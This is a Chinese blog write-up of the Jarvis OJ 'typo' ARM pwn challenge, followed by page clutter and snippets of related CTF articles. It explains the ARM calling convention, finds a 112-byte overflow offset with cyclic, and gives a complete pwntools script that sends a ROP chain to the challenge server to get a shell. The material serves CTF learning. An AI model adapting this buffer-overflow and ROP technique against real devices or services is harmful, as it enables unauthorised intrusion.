jarvis oj typo

最新推荐文章于 2022-12-07 10:52:57 发布
最新推荐文章于 2022-12-07 10:52:57 发布
阅读量705 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41617275/article/details/89928378
版权

m4x的–如何pwn掉一个arm binary

arm 的参数 1 ~ 4 分别保存到 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡, 返回值存放在 r0中
在这里插入图片描述
by the way, arm 的 pc 指针相当于 eip/rip, b/bl 等指令实现了跳转

按程序流程输入超长的字符串,这里用pwndbg中的cyclic构造字符串,因为peda中的pattern好像有点问题。输入超长字符串后发现程序崩溃,返回值保存在r0中,也就是显示的rax。
在这里插入图片描述
在这里插入图片描述
查找r0中0x62616164在字符串的位置,为112,也就是缓冲区是0~111。

pwndbg> cyclic -l 0x62616164
112

接下来查找可利用的gadget
在这里插入图片描述
那么构造payload='a'*112+p32(0x20904)+p32(0x6c384)+p32(1)+p32(system_address)
找system_address只能靠经验了,符号表被去除了,网上有方法用rizzo还原符号表但一直安装不成功。
脚本如下:

from pwn import *
context.log_level = "debug"

#p = process("./typo")
p = remote("pwn2.jarvisoj.com", 9888)
    
p.sendafter("quit\n", "\n")
p.recvline()

payload = 'a' * 112 + p32(0x20904) + p32(0x6c384) + p32(1) + p32(0x110B4)
p.sendlineafter("\n", payload)
p.interactive()
发蝴蝶和大脑斧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2394
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
[Jarvis OJ - PWN]——Typo(内涵peak小知识)
Y_peak的博客
02-17 304
[Jarvis OJ - PWN]——Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构。还是第一次遇到。 peak小知识 和x86架构不同, arm架构arm 下的函数调用规定, 函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 ei
通过一道ARM PWN题引发的思考:jarvisOJ_typo
hollk’s blog
06-28 1314
最近做了一道ARM架构的PWN题,给我带来很多的思考。为什么要做ARM的呢?因为在很久之前就提及过想要向IoT漏洞挖掘方面进行延展,并且有过一段时间去复现一些路由器的漏洞,但是感觉基础并不是很扎实。所以这段时间潜心学习ARM寄存器及指令集,并且通过接下来的这道ARM PWN题进行实践与摸索,文章的末尾也会列出通过这道题带来的一些感悟 希望我们都能找到自己的方向,按照计划不断前行。编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
PWN-ARM-jarvisOJ_typo学习
最新发布
重启专家的博客
12-07 321
PWN-ARM-jarvisOJ_typo学习
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis声音.zip
09-28
"Jarvis声音.zip"这个压缩包文件显然与流行的科幻角色——钢铁侠托尼·斯塔克的人工智能助手Jarvis有关。Jarvis,全名Just A Rather Very Intelligent System,是漫威宇宙中的一个标志性元素,其在电影中以其独特、...
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
jarvis一个非常智能基于Webpack仪表板的浏览器
08-10
jarvis 一个非常智能基于Webpack仪表板的浏览器
jarvis 半色调 matlab
04-13
可应用于数字图像处理,将灰度图像或者彩色图像R,G,B某个通道的图像转换为二值图像,也称半色调处理
JARVISOJ RE
皮三宝好菜的博客
01-01 522
JARVISOJ RE 今天来吧三道恶心的re写一下。。。 难度从自我感觉的简单到坑排序 爬楼梯 这题其实最“简单”hiahiahia 经过多次实验,其实只要手速过快,轻轻松松啊。 //电脑xps15触屏,更加轻松了23333 =.= evil exe 文件加壳了,直接脱壳,完事后拖入ida 从里面的许多256可以联想到rc4,具体加密过程也不复杂。 这边直接给代码了。 #include &...
Jarvisoj 逆向总结
Assassin
10-13 3825
因为本人是菜鸟,所以由简单但难的做了 [61dctf]androideasy 没什么可说的,直接反汇编打求一下密码 #_*_coding:utf-8_*_ a=[113, 123, 118, 112, 108, 94, 99, 72, 38, 68, 72, 87, 89, 72, 36, 118, 100, 78, 72, 87, 121, 83, 101, 39, 62, 94,...
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 2825
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
PWN题搭建
weixin_30855761的博客
06-07 553
0x00.准备题目 例如:level.c #include <stdio.h> #include <unistd.h> int main(){ char buffer[0x10] = {0}; setvbuf(stdout, NULL, _IOLBF, 0); printf("Do your kown what is it : ...
jarvisoj刷题之旅】逆向题目软件密码破解-1的writeup
iqiqiya的博客
09-10 1210
刚开始PEiD查到 百度了一下说是一个壳 把我吓坏了  没见过这玩意 找了几个脱壳机发现都没用    于是直接载入IDA  但好多函数  看不懂   又载入OD 中文搜索引擎发现“你赢了” 于是在段首下断 下图是正读取输入123456789     下面是重要的一个地方 将与我们的input对比的数据抠出来 004377F1             ...
vc++ 逆向工具_IoT设备逆向工程中的函数识别
weixin_39528843的博客
12-14 656
本怪乃CERNET余孽,请直接下载TXT原文阅读:http://scz.617.cn:8/misc/201905081756.txt目录: ☆ 前言 ☆ 函数识别/符号迁移 1) FLIRT 1.1) FLIRT简介 1.2) 签名文件 1.3) 应用签名 1.4) FLAI...
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值